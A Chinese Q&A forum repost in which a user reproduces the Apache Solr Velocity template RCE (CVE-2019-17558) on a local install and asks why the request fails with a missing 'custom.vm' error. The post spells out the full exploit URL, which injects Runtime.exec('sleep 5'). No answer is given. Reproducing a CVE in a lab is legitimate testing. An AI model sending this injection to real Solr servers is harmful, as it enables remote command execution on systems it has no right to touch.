我下载了solr 8.2.0并执行了一系列步骤。他们是：

cat README.txt
bin/solr create -c test
bin/solr start

访问了该网址：
http://127.0.0.1:8983/solr/test/select?q=hi #works
http://127.0.0.1:8983/solr/test/select?q=hi&&wt=velocity&&v.template=custom&v.template.custom=$class.inspect(%22java.lang.Runtime%22).type.getRuntime().exec(%22sleep%205%22).waitFor()＃它引发错误。

我正在关注此https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability或更具体地说是此https://www.tenable.com/sites/drupal.dmz.tenablesecurity.com/files/images/blog/solr-rce-web.gif ..我认为这可能会导致5秒的延迟。

但是，我遇到{msg=Unable to find resource 'custom.vm',trace=java.io.IOException: Unable to find resource 'custom.vm'错误。该图片Error中充分显示了该错误。无论如何找到解决此错误的方法？

解决方法

暂无找到可以解决该程序问题的有效方法，小编努力寻找整理中！

如果你已经找到好的解决方法，欢迎将解决方案带上本链接一起发送给小编。

小编邮箱:dio#foxmail.com (将#修改为@）